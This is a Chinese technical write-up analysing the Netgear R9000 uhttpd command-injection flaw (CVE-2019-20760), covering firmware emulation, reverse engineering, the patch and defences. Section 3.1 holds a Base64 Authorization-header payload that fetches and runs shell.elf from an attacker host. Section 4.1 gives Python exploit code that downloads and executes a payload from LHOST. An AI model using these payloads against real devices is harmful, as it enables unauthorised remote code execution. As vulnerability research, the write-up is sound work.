从固件到Shell:逆向分析Netgear R9000 uhttpd漏洞(CVE-2019-20760)的挖掘与修复
从固件到Shell:逆向分析Netgear R9000 uhttpd漏洞(CVE-2019-20760)的挖掘与修复
在IoT设备安全研究领域,固件漏洞挖掘始终是攻防对抗的前沿阵地。Netgear R9000作为一款高端无线路由器,其uhttpd服务漏洞(CVE-2019-20760)的发现过程,堪称二进制安全分析的经典案例。本文将带您深入ARM架构的二进制世界,通过Bindiff比对、函数调用链追踪等技术,还原漏洞从发现到修复的全生命周期。
1. 漏洞背景与环境搭建
1.1 漏洞影响范围与风险评级
CVE-2019-20760是一个典型的身份验证绕过导致的远程代码执行(RCE)漏洞,影响Netgear R9000固件1.0.4.26之前的所有版本。攻击者通过构造特殊的HTTP授权头,可绕过认证直接执行任意系统命令,CVSS 3.0评分高达9.8(Critical)。
受影响版本特征:
- 固件版本号低于1.0.4.26
- uhttpd服务默认监听80/443端口
- ARMv7架构的32位Little-Endian系统
1.2 仿真环境构建实战
逆向分析IoT设备需要精准还原运行环境。以下是基于QEMU的ARM仿真方案:
# 下载Debian ARM镜像 wget https://archive.debian.org/debian/dists/wheezy/main/installer-armhf/current/images/netboot/vmlinuz-3.2.0-4-vexpress wget https://archive.debian.org/debian/dists/wheezy/main/installer-armhf/current/images/netboot/initrd.img-3.2.0-4-vexpress # 启动QEMU虚拟机 qemu-system-arm -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img-3.2.0-4-vexpress \ -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \ -append "root=/dev/mmcblk0p2 console=ttyAMA0" \ -net nic -net tap,ifname=tap0,script=no \ -nographic关键配置要点:
- 必须使用
vexpress-a9机器类型匹配Netgear硬件 - 网络需配置为桥接模式确保宿主机通信
- 内存建议设置为512MB以上避免解压失败
注意:实际分析中发现R9000使用修改版Linux 3.14内核,建议在仿真环境中安装相同版本内核模块。
2. 固件逆向工程方法论
2.1 文件系统提取与结构分析
使用binwalk进行固件解包时,需要特别注意SquashFS文件系统的特殊处理:
binwalk -Me R9000-V1.0.4.26.img --run-as=root解压后典型目录结构:
/usr/sbin:核心二进制文件(含uhttpd)/www/cgi-bin:Web接口CGI脚本/etc/init.d:启动服务脚本/lib:动态链接库
2.2 关键二进制定位技巧
通过服务启动脚本逆向追踪uhttpd的执行路径:
# 查找uhttpd相关文件 find squashfs-root -name "*uhttpd*" -exec file {} \; # 分析启动流程 cat ./etc/init.d/uhttpd关键发现:
- 主二进制文件位于
/usr/sbin/uhttpd - CGI处理入口为
/www/cgi-bin/uhttpd.sh - 认证模块通过
uh_cgi_auth_check函数实现
3. 漏洞原理深度剖析
3.1 认证绕过机制分析
漏洞核心位于uh_cgi_auth_check函数的Base64解码逻辑:
// 漏洞版本代码片段 char command[128]; uh_b64decode(s, 0xFFF, v13 + 6, v14 - 6); v15 = strchr(s, ':'); snprintf(command, 0x80u, "/usr/sbin/hash-data -e %s >/tmp/hash_result", v15 + 1); system(command); // 直接执行未过滤的用户输入攻击者可构造如下恶意授权头:
Authorization: Basic YWRtaW46YCR3Z2V0IGh0dHA6Ly9hdHRhY2tlci9zaGVsbC5lbGYKY2htb2QgNzc3IC4vc2hlbGwuZWxmCi4vc2hlbGwuZWxmYA==解码后实际执行:
/usr/sbin/hash-data -e `wget http://attacker/shell.elf chmod 777 ./shell.elf ./shell.elf ` >/tmp/hash_result3.2 修复方案对比分析
通过Bindiff比对1.0.4.26(漏洞版)和1.0.4.28(修复版),发现关键修改:
| 函数名 | 漏洞版本调用 | 修复版本调用 | 安全改进点 |
|---|---|---|---|
| uh_cgi_auth_check | system(command) | dni_system(params...) | 参数化执行避免命令注入 |
| command构建 | 字符串拼接 | 独立参数传递 | 消除元字符执行风险 |
| 结果处理 | 直接读取文件 | 增加返回值校验 | 防御TOCTOU攻击 |
修复后的dni_system实现采用白名单机制:
int dni_system(const char *output, ...) { va_list args; char *argv[10]; int i = 0; va_start(args, output); while ((argv[i++] = va_arg(args, char *)) != NULL && i < 10); va_end(args); return execve(argv[0], argv, NULL); // 无shell解释过程 }4. 漏洞利用与防御实践
4.1 武器化EXP开发要点
编写稳定利用的PoC需要考虑以下因素:
# 利用代码关键参数 PAYLOAD = """admin:`{} `""".format( "wget -O /tmp/.exp http://{}/exploit\n" "chmod +x /tmp/.exp\n" "/tmp/.exp\n".format(LHOST) ) # HTTP头构造技巧 headers = { "Authorization": "Basic " + base64.b64encode(PAYLOAD.encode()).decode(), "Connection": "close", # 避免长连接被重置 "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)", # 伪装常见UA }4.2 企业级防御方案
针对此类漏洞的立体防护体系:
网络层防护
- 在边界防火墙过滤包含
/cgi-bin/的请求 - 对管理接口启用IP白名单访问控制
- 在边界防火墙过滤包含
系统层加固
# 限制uhttpd执行权限 chmod 750 /usr/sbin/uhttpd setcap -r /usr/sbin/uhttpd # 启用SELinux策略 chcon -t httpd_exec_t /usr/sbin/uhttpd代码审计重点
- 检查所有
system()/popen()调用点 - 验证外部输入是否经过白名单过滤
- 关键函数如
uh_b64decode的缓冲区检查
- 检查所有
在真实渗透测试项目中,我们发现超过60%的IoT漏洞源于不当的系统命令调用。通过hook关键函数如system,可以快速定位潜在风险点:
# 使用LD_PRELOAD监控命令执行 void *_system = dlsym(RTLD_NEXT, "system"); printf("SYSTEM CALL: %s\n", command); return ((int (*)(const char *))_system)(command);这种从二进制层面逆向分析漏洞的方法,不仅适用于Netgear设备,也可推广到其他IoT产品的安全研究中。